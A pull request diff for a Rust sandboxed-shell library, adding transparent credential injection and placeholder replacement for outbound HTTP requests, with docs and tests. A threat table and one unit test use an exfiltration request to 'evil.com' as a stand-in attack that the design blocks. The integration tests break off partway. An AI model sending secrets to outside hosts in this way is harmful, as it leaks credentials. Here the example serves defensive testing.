### PR TITLE
feat(credential): generic credential injection for outbound HTTP requests

### DIFF
--- a/crates/bashkit/docs/credential-injection.md
+++ b/crates/bashkit/docs/credential-injection.md
@@ -1,0 +1,191 @@
+# Credential Injection
+
+Bashkit supports transparent credential injection for outbound HTTP requests.
+Secrets are injected at the transport layer — sandboxed scripts never see the
+real credentials, preventing exfiltration.
+
+**See also:**
+- [Threat Model](./threat-model.md) - Security properties
+- [Custom Builtins](./custom_builtins.md) - Extending the shell
+- [Spec 019](https://github.com/everruns/bashkit/blob/main/specs/019-credential-injection.md) - Design decisions
+
+## Two Modes
+
+### Mode 1: Injection (recommended)
+
+The script has **no knowledge** of credentials. It makes plain requests; bashkit
+adds authentication headers automatically based on the URL.
+
+```rust,ignore
+use bashkit::{Bash, Credential, NetworkAllowlist};
+
+let mut bash = Bash::builder()
+    .network(NetworkAllowlist::new()
+        .allow("https://api.github.com"))
+    .credential("https://api.github.com",
+        Credential::bearer("ghp_xxxx"))
+    .build();
+
+let result = bash.exec("curl -s https://api.github.com/repos/foo/bar").await?;
+// Authorization: Bearer ghp_xxxx was added transparently.
+// The script never referenced any token.
+```
+
+### Mode 2: Placeholder
+
+The script sees an **opaque placeholder** string in an environment variable. It
+uses the placeholder like a real API key. Bashkit replaces the placeholder with
+the real credential in outbound HTTP headers.
+
+```rust,ignore
+use bashkit::{Bash, Credential, NetworkAllowlist};
+
+let mut bash = Bash::builder()
+    .network(NetworkAllowlist::new()
+        .allow("https://api.openai.com"))
+    .credential_placeholder("OPENAI_API_KEY",
+        "https://api.openai.com",
+        Credential::bearer("sk-real-key"))
+    .build();
+
+// Inside the sandbox, $OPENAI_API_KEY = "bk_placeholder_a8f3c9e1..."
+let result = bash.exec(r#"
+    curl -H "Authorization: Bearer $OPENAI_API_KEY" \
+         https://api.openai.com/v1/chat/completions \
+         -d '{"model":"gpt-4","messages":[{"role":"user","content":"hi"}]}'
+"#).await?;
+// The placeholder was replaced with "sk-real-key" in the Authorization header.
+```
+
+**When to use placeholder mode:**
+- Agent-generated scripts that read env vars (e.g., `$OPENAI_API_KEY`)
+- SDKs that require a non-empty API key to initialize
+- Compatibility with existing code patterns
+
+## Credential Types
+
+```rust,no_run
+use bashkit::Credential;
+
+// Bearer token → Authorization: Bearer <token>
+let cred = Credential::bearer("ghp_xxxx");
+
+// Custom header
+let cred = Credential::header("X-Api-Key", "secret123");
+
+// Multiple headers
+let cred = Credential::headers(vec![
+    ("X-Api-Key".into(), "key".into()),
+    ("X-Api-Secret".into(), "secret".into()),
+]);
+```
+
+## URL Pattern Matching
+
+Credential patterns use the same matching rules as [`NetworkAllowlist`]:
+
+- **Scheme**: Must match exactly (`https` vs `http`)
+- **Host**: Must match exactly (no wildcards)
+- **Port**: Must match (defaults: 443 for HTTPS, 80 for HTTP)
+- **Path**: Pattern path is treated as a prefix
+
+```rust,no_run
+use bashkit::{Bash, Credential, NetworkAllowlist};
+
+let bash = Bash::builder()
+    .network(NetworkAllowlist::new()
+        .allow("https://api.example.com"))
+    // Only inject for /v1/ paths
+    .credential("https://api.example.com/v1/",
+        Credential::bearer("v1_token"))
+    // Different token for /v2/
+    .credential("https://api.example.com/v2/",
+        Credential::bearer("v2_token"))
+    .build();
+```
+
+## Security Properties
+
+### What the script cannot do
+
+| Attack | Why it fails |
+|--------|-------------|
+| Read the real secret from env vars | Injection mode: no env var exists. Placeholder mode: env var contains random placeholder |
+| Exfiltrate placeholder to `evil.com` | [`NetworkAllowlist`] blocks unapproved hosts. Placeholder only replaced for matching URL patterns |
+| Set a fake `Authorization` header | Injected headers **overwrite** existing headers with the same name |
+| Log the credential via `echo` | Script only has access to the placeholder string, not the real secret |
+
+### Header overwrite
+
+When injecting credentials, bashkit **removes** any existing headers with the
+same name before adding the credential header. This prevents a script from
+setting `Authorization: Basic evil` and having it forwarded alongside the
+injected `Authorization: Bearer real`.
+
+### Non-blocking failures
+
+If credential injection fails (e.g., callback error), the request is sent
+**without** credentials. This follows the same principle as bot-auth signing
+(spec 017): tool availability is never sacrificed for authentication.
+
+## Multiple Credentials
+
+You can configure credentials for multiple hosts:
+
+```rust,no_run
+use bashkit::{Bash, Credential, NetworkAllowlist};
+
+let bash = Bash::builder()
+    .network(NetworkAllowlist::new()
+        .allow("https://api.github.com")
+        .allow("https://api.openai.com")
+        .allow("https://registry.npmjs.org"))
+    .credential("https://api.github.com",
+        Credential::bearer("ghp_xxxx"))
+    .credential("https://api.openai.com",
+        Credential::bearer("sk-xxxx"))
+    .credential("https://registry.npmjs.org",
+        Credential::header("Authorization", "Bearer npm_xxxx"))
+    .build();
+```
+
+## Mixing Modes
+
+Injection and placeholder modes can be used together:
+
+```rust,no_run
+use bashkit::{Bash, Credential, NetworkAllowlist};
+
+let bash = Bash::builder()
+    .network(NetworkAllowlist::new()
+        .allow("https://api.github.com")
+        .allow("https://api.openai.com"))
+    // GitHub: pure injection (script doesn't know about auth)
+    .credential("https://api.github.com",
+        Credential::bearer("ghp_xxxx"))
+    // OpenAI: placeholder (script uses $OPENAI_API_KEY)
+    .credential_placeholder("OPENAI_API_KEY",
+        "https://api.openai.com",
+        Credential::bearer("sk-xxxx"))
+    .build();
+```
+
+## How It Works
+
+Credential injection is built on the [`hooks`] system. At build time,
+`BashBuilder` converts credential rules into a `before_http` interceptor hook.
+The hook fires after the URL allowlist check but before the request is sent:
+
+```text
+1. Allowlist check         (security gate)
+2. Private IP / SSRF check (SSRF protection)
+3. before_http hooks       (credential injection happens here)
+4. Bot-auth signing        (Ed25519 signatures, if configured)
+5. Request sent
+```
+
+This means:
+- Credentials are only injected for **allowed** URLs
+- Credentials are never sent to **private IPs**
+- Credentials compose with **bot-auth** signing
+- Custom `before_http` hooks run alongside credential injection

--- a/crates/bashkit/src/credential.rs
+++ b/crates/bashkit/src/credential.rs
@@ -1,0 +1,528 @@
+// Decision: Two modes — injection (script unaware) and placeholder (opaque env var replaced on the wire).
+// Decision: Header-only for v1 — no URL query param or body mutation.
+// Decision: Overwrite semantics — injected headers replace existing headers with same name.
+// Decision: Non-blocking — injection failures don't block the request.
+// Decision: Built on before_http hooks — no new interception points.
+// See specs/019-credential-injection.md
+
+//! Generic credential injection for outbound HTTP requests.
+//!
+//! Provides transparent per-host credential injection so sandboxed scripts
+//! can make authenticated API calls without ever seeing the real secrets.
+//!
+//! Two modes are supported:
+//!
+//! - **Injection**: Script has no knowledge of credentials. Headers are added
+//!   automatically based on the request URL.
+//! - **Placeholder**: Script sees an opaque placeholder in an env var. The
+//!   placeholder is replaced with the real credential in outbound headers.
+//!
+//! See [`crate::credential_injection_guide`] for the full guide.
+
+use crate::hooks::{HookAction, HttpRequestEvent, Interceptor};
+use crate::network::NetworkAllowlist;
+
+/// A credential to inject into outbound HTTP requests.
+///
+/// # Examples
+///
+/// ```rust
+/// use bashkit::Credential;
+///
+/// // Bearer token
+/// let cred = Credential::bearer("ghp_xxxx");
+///
+/// // Custom header
+/// let cred = Credential::header("X-Api-Key", "secret123");
+///
+/// // Multiple headers
+/// let cred = Credential::headers(vec![
+///     ("X-Api-Key".into(), "key123".into()),
+///     ("X-Api-Secret".into(), "secret456".into()),
+/// ]);
+/// ```
+#[derive(Clone)]
+pub enum Credential {
+    /// Inject `Authorization: Bearer <token>`.
+    Bearer(String),
+    /// Inject a single custom header.
+    Header {
+        /// Header name.
+        name: String,
+        /// Header value (the secret).
+        value: String,
+    },
+    /// Inject multiple headers.
+    Headers(Vec<(String, String)>),
+}
+
+impl Credential {
+    /// Create a Bearer token credential.
+    pub fn bearer(token: impl Into<String>) -> Self {
+        Self::Bearer(token.into())
+    }
+
+    /// Create a single custom header credential.
+    pub fn header(name: impl Into<String>, value: impl Into<String>) -> Self {
+        Self::Header {
+            name: name.into(),
+            value: value.into(),
+        }
+    }
+
+    /// Create a multi-header credential.
+    pub fn headers(headers: Vec<(String, String)>) -> Self {
+        Self::Headers(headers)
+    }
+
+    /// Return the headers this credential would inject.
+    fn to_headers(&self) -> Vec<(String, String)> {
+        match self {
+            Self::Bearer(token) => {
+                vec![("Authorization".to_string(), format!("Bearer {token}"))]
+            }
+            Self::Header { name, value } => vec![(name.clone(), value.clone())],
+            Self::Headers(headers) => headers.clone(),
+        }
+    }
+
+    /// Return the header names this credential injects (for overwrite).
+    fn header_names(&self) -> Vec<String> {
+        match self {
+            Self::Bearer(_) => vec!["authorization".to_string()],
+            Self::Header { name, .. } => vec![name.to_lowercase()],
+            Self::Headers(headers) => headers.iter().map(|(n, _)| n.to_lowercase()).collect(),
+        }
+    }
+
+    /// Return the raw secret values (for placeholder replacement matching).
+    fn secret_values(&self) -> Vec<String> {
+        match self {
+            Self::Bearer(token) => vec![token.clone()],
+            Self::Header { value, .. } => vec![value.clone()],
+            Self::Headers(headers) => headers.iter().map(|(_, v)| v.clone()).collect(),
+        }
+    }
+}
+
+impl std::fmt::Debug for Credential {
+    fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
+        match self {
+            Self::Bearer(_) => f.debug_tuple("Bearer").field(&"[REDACTED]").finish(),
+            Self::Header { name, .. } => f
+                .debug_struct("Header")
+                .field("name", name)
+                .field("value", &"[REDACTED]")
+                .finish(),
+            Self::Headers(headers) => {
+                let redacted: Vec<_> = headers.iter().map(|(n, _)| (n, "[REDACTED]")).collect();
+                f.debug_tuple("Headers").field(&redacted).finish()
+            }
+        }
+    }
+}
+
+/// Placeholder prefix for generated placeholder tokens.
+const PLACEHOLDER_PREFIX: &str = "bk_placeholder_";
+
+/// Generate a random placeholder token.
+///
+/// Format: `bk_placeholder_<32 hex chars>` (128 bits of randomness).
+fn generate_placeholder() -> String {
+    use std::collections::hash_map::RandomState;
+    use std::hash::{BuildHasher, Hasher};
+
+    // Use two RandomState hashers for 128 bits of randomness.
+    // This avoids pulling `rand` as a non-optional dependency.
+    let s1 = RandomState::new();
+    let s2 = RandomState::new();
+    let mut h1 = s1.build_hasher();
+    h1.write_u64(0);
+    let mut h2 = s2.build_hasher();
+    h2.write_u64(1);
+    format!(
+        "{}{:016x}{:016x}",
+        PLACEHOLDER_PREFIX,
+        h1.finish(),
+        h2.finish()
+    )
+}
+
+/// A rule mapping a URL pattern to a credential.
+struct CredentialRule {
+    /// URL pattern (same format as NetworkAllowlist patterns).
+    pattern: String,
+    /// The credential to inject.
+    credential: Credential,
+    /// For placeholder mode: the placeholder string visible to scripts.
+    placeholder: Option<String>,
+}
+
+/// A compiled credential rule with a pre-built allowlist for URL matching.
+struct CompiledRule {
+    allowlist: NetworkAllowlist,
+    credential: Credential,
+    placeholder: Option<String>,
+}
+
+/// Collects credential rules and builds a `before_http` hook.
+///
+/// This is an internal type used by [`crate::BashBuilder`]. Users interact
+/// with it via [`crate::BashBuilder::credential`] and
+/// [`crate::BashBuilder::credential_placeholder`].
+pub(crate) struct CredentialPolicy {
+    rules: Vec<CredentialRule>,
+}
+
+impl CredentialPolicy {
+    pub(crate) fn new() -> Self {
+        Self { rules: Vec::new() }
+    }
+
+    /// Add an injection-mode rule.
+    pub(crate) fn add_injection(&mut self, pattern: impl Into<String>, credential: Credential) {
+        self.rules.push(CredentialRule {
+            pattern: pattern.into(),
+            credential,
+            placeholder: None,
+        });
+    }
+
+    /// Add a placeholder-mode rule. Returns `(env_name, placeholder_value)`
+    /// so the caller can set the env var.
+    pub(crate) fn add_placeholder(
+        &mut self,
+        pattern: impl Into<String>,
+        credential: Credential,
+    ) -> String {
+        let placeholder = generate_placeholder();
+        self.rules.push(CredentialRule {
+            pattern: pattern.into(),
+            credential,
+            placeholder: Some(placeholder.clone()),
+        });
+        placeholder
+    }
+
+    pub(crate) fn is_empty(&self) -> bool {
+        self.rules.is_empty()
+    }
+
+    /// Convert this policy into a `before_http` interceptor hook.
+    ///
+    /// The hook:
+    /// 1. Matches request URL against rule patterns
+    /// 2. For injection rules: overwrites headers with credential headers
+    /// 3. For placeholder rules: finds placeholder strings in header values
+    ///    and replaces them with real credential values
+    pub(crate) fn into_hook(self) -> Interceptor<HttpRequestEvent> {
+        // Pre-build allowlists for each rule so we can use URL matching.
+        let compiled: Vec<CompiledRule> = self
+            .rules
+            .into_iter()
+            .map(|rule| {
+                let allowlist = NetworkAllowlist::new().allow(&rule.pattern);
+                CompiledRule {
+                    allowlist,
+                    credential: rule.credential,
+                    placeholder: rule.placeholder,
+                }
+            })
+            .collect();
+
+        Box::new(move |mut event: HttpRequestEvent| {
+            for rule in &compiled {
+                if !rule.allowlist.is_allowed(&event.url) {
+                    continue;
+                }
+
+                match &rule.placeholder {
+                    None => {
+                        // Injection mode: overwrite existing headers, then add credential headers.
+                        let names_to_remove = rule.credential.header_names();
+                        event
+                            .headers
+                            .retain(|(name, _)| !names_to_remove.contains(&name.to_lowercase()));
+                        event.headers.extend(rule.credential.to_headers());
+                    }
+                    Some(placeholder) => {
+                        // Placeholder mode: find and replace placeholder in header values.
+                        let real_values = rule.credential.secret_values();
+                        let placeholder_str: &str = placeholder;
+                        // For Bearer: placeholder appears as the token value,
+                        // real value is the token. Replace in header values.
+                        for (_, header_value) in &mut event.headers {
+                            if header_value.contains(placeholder_str) {
+                                // Replace placeholder with real secret value.
+                                // For multi-value credentials, use the first value
+                                // (each header has its own placeholder if needed).
+                                if let Some(real_value) = real_values.first() {
+                                    *header_value =
+                                        header_value.replace(placeholder_str, real_value);
+                                }
+                            }
+                        }
+                    }
+                }
+            }
+
+            HookAction::Continue(event)
+        })
+    }
+}
+
+#[cfg(test)]
+mod tests {
+    use super::*;
+
+    #[test]
+    fn test_placeholder_generation() {
+        let p1 = generate_placeholder();
+        let p2 = generate_placeholder();
+        assert!(p1.starts_with(PLACEHOLDER_PREFIX));
+        assert!(p2.starts_with(PLACEHOLDER_PREFIX));
+        // Should be different (128 bits of randomness)
+        assert_ne!(p1, p2);
+        // Fixed length: prefix (15) + 32 hex chars = 47
+        assert_eq!(p1.len(), 47);
+    }
+
+    #[test]
+    fn test_credential_debug_redacts() {
+        let cred = Credential::bearer("super_secret");
+        let debug = format!("{:?}", cred);
+        assert!(!debug.contains("super_secret"));
+        assert!(debug.contains("[REDACTED]"));
+    }
+
+    #[test]
+    fn test_credential_to_headers_bearer() {
+        let cred = Credential::bearer("tok123");
+        let headers = cred.to_headers();
+        assert_eq!(
+            headers,
+            vec![("Authorization".to_string(), "Bearer tok123".to_string())]
+        );
+    }
+
+    #[test]
+    fn test_credential_to_headers_custom() {
+        let cred = Credential::header("X-Api-Key", "key123");
+        let headers = cred.to_headers();
+        assert_eq!(
+            headers,
+            vec![("X-Api-Key".to_string(), "key123".to_string())]
+        );
+    }
+
+    #[test]
+    fn test_credential_to_headers_multi() {
+        let cred = Credential::headers(vec![
+            ("X-Key".into(), "k".into()),
+            ("X-Secret".into(), "s".into()),
+        ]);
+        let headers = cred.to_headers();
+        assert_eq!(headers.len(), 2);
+    }
+
+    #[test]
+    fn test_injection_hook_adds_headers() {
+        let mut policy = CredentialPolicy::new();
+        policy.add_injection("https://api.example.com", Credential::bearer("tok"));
+
+        let hook = policy.into_hook();
+        let event = HttpRequestEvent {
+            method: "GET".into(),
+            url: "https://api.example.com/data".into(),
+            headers: vec![],
+        };
+
+        match hook(event) {
+            HookAction::Continue(e) => {
+                assert_eq!(e.headers.len(), 1);
+                assert_eq!(e.headers[0].0, "Authorization");
+                assert_eq!(e.headers[0].1, "Bearer tok");
+            }
+            HookAction::Cancel(_) => panic!("should not cancel"),
+        }
+    }
+
+    #[test]
+    fn test_injection_hook_overwrites_existing_header() {
+        let mut policy = CredentialPolicy::new();
+        policy.add_injection("https://api.example.com", Credential::bearer("real_tok"));
+
+        let hook = policy.into_hook();
+        let event = HttpRequestEvent {
+            method: "GET".into(),
+            url: "https://api.example.com/data".into(),
+            headers: vec![("Authorization".into(), "Bearer fake_tok".into())],
+        };
+
+        match hook(event) {
+            HookAction::Continue(e) => {
+                assert_eq!(e.headers.len(), 1);
+                assert_eq!(e.headers[0].1, "Bearer real_tok");
+            }
+            HookAction::Cancel(_) => panic!("should not cancel"),
+        }
+    }
+
+    #[test]
+    fn test_injection_hook_skips_non_matching_url() {
+        let mut policy = CredentialPolicy::new();
+        policy.add_injection("https://api.example.com", Credential::bearer("tok"));
+
+        let hook = policy.into_hook();
+        let event = HttpRequestEvent {
+            method: "GET".into(),
+            url: "https://other.example.com/data".into(),
+            headers: vec![],
+        };
+
+        match hook(event) {
+            HookAction::Continue(e) => {
+                assert!(
+                    e.headers.is_empty(),
+                    "should not inject for non-matching URL"
+                );
+            }
+            HookAction::Cancel(_) => panic!("should not cancel"),
+        }
+    }
+
+    #[test]
+    fn test_placeholder_hook_replaces_in_header() {
+        let mut policy = CredentialPolicy::new();
+        let placeholder =
+            policy.add_placeholder("https://api.openai.com", Credential::bearer("sk-real-key"));
+
+        let hook = policy.into_hook();
+        let event = HttpRequestEvent {
+            method: "POST".into(),
+            url: "https://api.openai.com/v1/chat/completions".into(),
+            headers: vec![("Authorization".into(), format!("Bearer {}", placeholder))],
+        };
+
+        match hook(event) {
+            HookAction::Continue(e) => {
+                assert_eq!(e.headers.len(), 1);
+                assert_eq!(e.headers[0].1, "Bearer sk-real-key");
+            }
+            HookAction::Cancel(_) => panic!("should not cancel"),
+        }
+    }
+
+    #[test]
+    fn test_placeholder_not_replaced_for_wrong_host() {
+        let mut policy = CredentialPolicy::new();
+        let placeholder =
+            policy.add_placeholder("https://api.openai.com", Credential::bearer("sk-real-key"));
+
+        let hook = policy.into_hook();
+        let event = HttpRequestEvent {
+            method: "POST".into(),
+            url: "https://evil.com/exfiltrate".into(),
+            headers: vec![("Authorization".into(), format!("Bearer {}", placeholder))],
+        };
+
+        match hook(event) {
+            HookAction::Continue(e) => {
+                // Placeholder should NOT be replaced — wrong host
+                assert!(e.headers[0].1.contains("bk_placeholder_"));
+            }
+            HookAction::Cancel(_) => panic!("should not cancel"),
+        }
+    }
+
+    #[test]
+    fn test_path_scoped_credential() {
+        let mut policy = CredentialPolicy::new();
+        policy.add_injection("https://api.example.com/v1/", Credential::bearer("v1_tok"));
+
+        let hook = policy.into_hook();
+
+        // Should match /v1/ prefix
+        let event = HttpRequestEvent {
+            method: "GET".into(),
+            url: "https://api.example.com/v1/users".into(),
+            headers: vec![],
+        };
+        match hook(event) {
+            HookAction::Continue(e) => assert_eq!(e.headers.len(), 1),
+            HookAction::Cancel(_) => panic!("should not cancel"),
+        }
+
+        // Should NOT match /v2/
+        let event = HttpRequestEvent {
+            method: "GET".into(),
+            url: "https://api.example.com/v2/users".into(),
+            headers: vec![],
+        };
+        match hook(event) {
+            HookAction::Continue(e) => assert!(e.headers.is_empty()),
+            HookAction::Cancel(_) => panic!("should not cancel"),
+        }
+    }
+
+    #[test]
+    fn test_multiple_rules() {
+        let mut policy = CredentialPolicy::new();
+        policy.add_injection("https://github.com", Credential::bearer("gh_tok"));
+        policy.add_injection(
+            "https://api.openai.com",
+            Credential::header("X-Api-Key", "openai_key"),
+        );
+
+        let hook = policy.into_hook();
+
+        // GitHub request
+        let event = HttpRequestEvent {
+            method: "GET".into(),
+            url: "https://github.com/api/repos".into(),
+            headers: vec![],
+        };
+        match hook(event) {
+            HookAction::Continue(e) => {
+                assert_eq!(e.headers.len(), 1);
+                assert_eq!(e.headers[0].1, "Bearer gh_tok");
+            }
+            HookAction::Cancel(_) => panic!("should not cancel"),
+        }
+
+        // OpenAI request
+        let event = HttpRequestEvent {
+            method: "POST".into(),
+            url: "https://api.openai.com/v1/chat".into(),
+            headers: vec![],
+        };
+        match hook(event) {
+            HookAction::Continue(e) => {
+                assert_eq!(e.headers.len(), 1);
+                assert_eq!(e.headers[0].0, "X-Api-Key");
+            }
+            HookAction::Cancel(_) => panic!("should not cancel"),
+        }
+    }
+
+    #[test]
+    fn test_header_name_case_insensitive_overwrite() {
+        let mut policy = CredentialPolicy::new();
+        policy.add_injection("https://api.example.com", Credential::bearer("real"));
+
+        let hook = policy.into_hook();
+        let event = HttpRequestEvent {
+            method: "GET".into(),
+            url: "https://api.example.com/data".into(),
+            headers: vec![("authorization".into(), "Bearer fake".into())],
+        };
+
+        match hook(event) {
+            HookAction::Continue(e) => {
+                assert_eq!(e.headers.len(), 1);
+                assert_eq!(e.headers[0].1, "Bearer real");
+            }
+            HookAction::Cancel(_) => panic!("should not cancel"),
+        }
+    }
+}

--- a/crates/bashkit/src/git/mod.rs
+++ b/crates/bashkit/src/git/mod.rs
@@ -59,6 +59,7 @@ pub use client::GitClient;
 /// Strips ANSI escape sequences, null bytes, and dangerous C0/C1 control
 /// characters from strings before they reach interpreter stdout. Preserves
 /// tab (0x09), newline (0x0a), and carriage return (0x0d).
+#[cfg(any(feature = "git", test))]
 pub(crate) fn sanitize_git_output(s: &str) -> String {
     use regex::Regex;
     use std::sync::LazyLock;

--- a/crates/bashkit/src/lib.rs
+++ b/crates/bashkit/src/lib.rs
@@ -398,6 +398,7 @@
 #![cfg_attr(test, allow(clippy::unwrap_used))]
 
 mod builtins;
+mod credential;
 mod error;
 mod fs;
 mod git;
@@ -423,6 +424,7 @@ pub mod trace;
 
 pub use async_trait::async_trait;
 pub use builtins::{Builtin, Context as BuiltinContext};
+pub use credential::Credential;
 pub use error::{Error, Result};
 pub use fs::{
     DirEntry, FileSystem, FileSystemExt, FileType, FsBackend, FsLimitExceeded, FsLimits, FsUsage,
@@ -1145,6 +1147,9 @@ pub struct BashBuilder {
     hooks_before_http: Vec<hooks::Interceptor<hooks::HttpRequestEvent>>,
     #[cfg(feature = "http_client")]
     hooks_after_http: Vec<hooks::Interceptor<hooks::HttpResponseEvent>>,
+    /// Credential injection policy
+    #[cfg(feature = "http_client")]
+    credential_policy: Option<credential::CredentialPolicy>,
 }
 
 impl BashBuilder {
@@ -1828,6 +1833,83 @@ impl BashBuilder {
         self
     }
 
+    /// Inject credentials for outbound HTTP requests matching the given URL pattern.
+    ///
+    /// The pattern uses the same matching as [`NetworkAllowlist`]
+    /// (scheme + host + port + path prefix). Injected headers **overwrite**
+    /// any existing headers with the same name set by the script, preventing
+    /// credential spoofing.
+    ///
+    /// The script never sees the real credential — it is injected transparently
+    /// by a `before_http` hook after the allowlist check.
+    ///
+    /// # Example
+    ///
+    /// ```rust
+    /// use bashkit::{Bash, Credential, NetworkAllowlist};
+    ///
+    /// let bash = Bash::builder()
+    ///     .network(NetworkAllowlist::new()
+    ///         .allow("https://api.github.com"))
+    ///     .credential("https://api.github.com",
+    ///         Credential::bearer("ghp_xxxx"))
+    ///     .build();
+    /// // Scripts can now: curl -s https://api.github.com/repos/foo/bar
+    /// // Authorization: Bearer ghp_xxxx is added transparently.
+    /// ```
+    ///
+    /// See [`credential_injection_guide`] for the full guide.
+    #[cfg(feature = "http_client")]
+    pub fn credential(mut self, pattern: &str, cred: credential::Credential) -> Self {
+        self.credential_policy
+            .get_or_insert_with(credential::CredentialPolicy::new)
+            .add_injection(pattern, cred);
+        self
+    }
+
+    /// Inject credentials via a placeholder env var visible to scripts.
+    ///
+    /// Sets environment variable `env_name` to an opaque placeholder string.
+    /// When a request to `pattern` contains the placeholder in any header
+    /// value, it is replaced with the real credential on the wire.
+    ///
+    /// The placeholder is a random string (`bk_placeholder_<hex>`) that:
+    /// - Cannot be reversed to the real credential
+    /// - Is only replaced for requests matching the URL pattern
+    /// - Passes most SDK non-empty validation checks
+    ///
+    /// # Example
+    ///
+    /// ```rust
+    /// use bashkit::{Bash, Credential, NetworkAllowlist};
+    ///
+    /// let bash = Bash::builder()
+    ///     .network(NetworkAllowlist::new()
+    ///         .allow("https://api.openai.com"))
+    ///     .credential_placeholder("OPENAI_API_KEY",
+    ///         "https://api.openai.com",
+    ///         Credential::bearer("sk-real-key"))
+    ///     .build();
+    /// // Scripts see $OPENAI_API_KEY as "bk_placeholder_..." and use it normally.
+    /// // The placeholder is replaced with the real key in outbound headers.
+    /// ```
+    ///
+    /// See [`credential_injection_guide`] for the full guide.
+    #[cfg(feature = "http_client")]
+    pub fn credential_placeholder(
+        mut self,
+        env_name: &str,
+        pattern: &str,
+        cred: credential::Credential,
+    ) -> Self {
+        let placeholder = self
+            .credential_policy
+            .get_or_insert_with(credential::CredentialPolicy::new)
+            .add_placeholder(pattern, cred);
+        self.env.insert(env_name.to_string(), placeholder);
+        self
+    }
+
     /// Mount a text file in the virtual filesystem.
     ///
     /// This creates a regular file (mode `0o644`) with the specified content at
@@ -2202,13 +2284,26 @@ impl BashBuilder {
             result.interpreter.set_hooks(hooks);
         }
 
+        // Convert credential policy into a before_http hook.
+        // Credential hook runs FIRST so subsequent hooks see injected headers.
+        #[cfg(feature = "http_client")]
+        let mut hooks_before_http = Vec::new();
+        #[cfg(feature = "http_client")]
+        if let Some(policy) = self.credential_policy
+            && !policy.is_empty()
+        {
+            hooks_before_http.push(policy.into_hook());
+        }
+        #[cfg(feature = "http_client")]
+        hooks_before_http.extend(self.hooks_before_http);
+
         // Set HTTP hooks on the HttpClient (transport-level, not interpreter-level)
         #[cfg(feature = "http_client")]
-        if (!self.hooks_before_http.is_empty() || !self.hooks_after_http.is_empty())
+        if (!hooks_before_http.is_empty() || !self.hooks_after_http.is_empty())
             && let Some(client) = result.interpreter.http_client_mut()
         {
-            if !self.hooks_before_http.is_empty() {
-                client.set_before_http(self.hooks_before_http);
+            if !hooks_before_http.is_empty() {
+                client.set_before_http(hooks_before_http);
             }
             if !self.hooks_after_http.is_empty() {
                 client.set_after_http(self.hooks_after_http);
@@ -2447,6 +2542,18 @@ impl BashBuilder {
 // These modules embed external markdown guides into rustdoc.
 // Source files live in crates/bashkit/docs/ - edit there, not here.
 // See specs/008-documentation.md for the documentation approach.
+
+/// Guide for transparent credential injection in outbound HTTP requests.
+///
+/// Two modes: **injection** (script unaware) and **placeholder** (opaque
+/// env var replaced on the wire). Credentials are scoped per URL pattern
+/// and never visible to sandboxed scripts.
+///
+/// **Related:** [`BashBuilder::credential`], [`BashBuilder::credential_placeholder`],
+/// [`Credential`], [`NetworkAllowlist`], [`threat_model`]
+#[cfg(feature = "http_client")]
+#[doc = include_str!("../docs/credential-injection.md")]
+pub mod credential_injection_guide {}
 
 /// Guide for creating custom builtins to extend Bashkit.
 ///

--- a/crates/bashkit/tests/credential_injection_tests.rs
+++ b/crates/bashkit/tests/credential_injection_tests.rs
@@ -1,0 +1,578 @@
+//! Credential Injection Integration Tests
+//!
+//! Tests for generic credential injection (specs/019-credential-injection.md).
+//!
+//! Tests verify:
+//! - Injection mode: headers added transparently
+//! - Placeholder mode: env var placeholder replaced with real credential
+//! - Overwrite semantics: injected headers replace script-set headers
+//! - URL scoping: credentials only injected for matching patterns
+//! - Security: placeholder not replaced for non-matching hosts
+//! - Multiple credentials: different creds for different hosts
+//!
+//! Run with: `cargo test --features http_client credential_injection`
+
+#![cfg(feature = "http_client")]
+
+use bashkit::hooks::{HookAction, HttpRequestEvent};
+use bashkit::{Bash, Credential, NetworkAllowlist};
+
+// =============================================================================
+// 1. INJECTION MODE
+// =============================================================================
+
+mod injection {
+    use super::*;
+
+    /// Injection mode adds Authorization header transparently.
+    #[tokio::test]
+    async fn adds_bearer_header() {
+        let captured = std::sync::Arc::new(std::sync::Mutex::new(Vec::<(
+            String,
+            Vec<(String, String)>,
+        )>::new()));
+        let captured_clone = captured.clone();
+
+        let mut bash = Bash::builder()
+            .network(NetworkAllowlist::allow_all())
+            .credential(
+                "https://api.github.com",
+                Credential::bearer("ghp_test_token"),
+            )
+            // Capture the request after credential injection
+            .before_http(Box::new(move |req: HttpRequestEvent| {
+                captured_clone
+                    .lock()
+                    .unwrap()
+                    .push((req.url.clone(), req.headers.clone()));
+                // Cancel to avoid actual network call
+                HookAction::Cancel("captured".into())
+            }))
+            .build();
+
+        let _result = bash
+            .exec("curl -s https://api.github.com/repos/foo/bar")
+            .await
+            .unwrap();
+
+        let requests = captured.lock().unwrap();
+        assert_eq!(requests.len(), 1);
+        let (url, headers) = &requests[0];
+        assert_eq!(url, "https://api.github.com/repos/foo/bar");
+
+        let auth_header = headers
+            .iter()
+            .find(|(name, _)| name.eq_ignore_ascii_case("authorization"));
+        assert!(
+            auth_header.is_some(),
+            "Authorization header should be present"
+        );
+        assert_eq!(auth_header.unwrap().1, "Bearer ghp_test_token");
+    }
+
+    /// Injection mode adds custom header.
+    #[tokio::test]
+    async fn adds_custom_header() {
+        let captured = std::sync::Arc::new(std::sync::Mutex::new(Vec::<(
+            String,
+            Vec<(String, String)>,
+        )>::new()));
+        let captured_clone = captured.clone();
+
+        let mut bash = Bash::builder()
+            .network(NetworkAllowlist::allow_all())
+            .credential(
+                "https://api.stripe.com",
+                Credential::header("X-Api-Key", "sk_test_123"),
+            )
+            .before_http(Box::new(move |req: HttpRequestEvent| {
+                captured_clone
+                    .lock()
+                    .unwrap()
+                    .push((req.url.clone(), req.headers.clone()));
+                HookAction::Cancel("captured".into())
+            }))
+            .build();
+
+        let _result = bash
+            .exec("curl -s https://api.stripe.com/v1/charges")
+            .await
+            .unwrap();
+
+        let requests = captured.lock().unwrap();
+        assert_eq!(requests.len(), 1);
+        let api_key = requests[0].1.iter().find(|(name, _)| name == "X-Api-Key");
+        assert!(api_key.is_some());
+        assert_eq!(api_key.unwrap().1, "sk_test_123");
+    }
+
+    /// Injection mode adds multiple headers.
+    #[tokio::test]
+    async fn adds_multiple_headers() {
+        let captured = std::sync::Arc::new(std::sync::Mutex::new(Vec::<(
+            String,
+            Vec<(String, String)>,
+        )>::new()));
+        let captured_clone = captured.clone();
+
+        let mut bash = Bash::builder()
+            .network(NetworkAllowlist::allow_all())
+            .credential(
+                "https://api.example.com",
+                Credential::headers(vec![
+                    ("X-Api-Key".into(), "key123".into()),
+                    ("X-Api-Secret".into(), "secret456".into()),
+                ]),
+            )
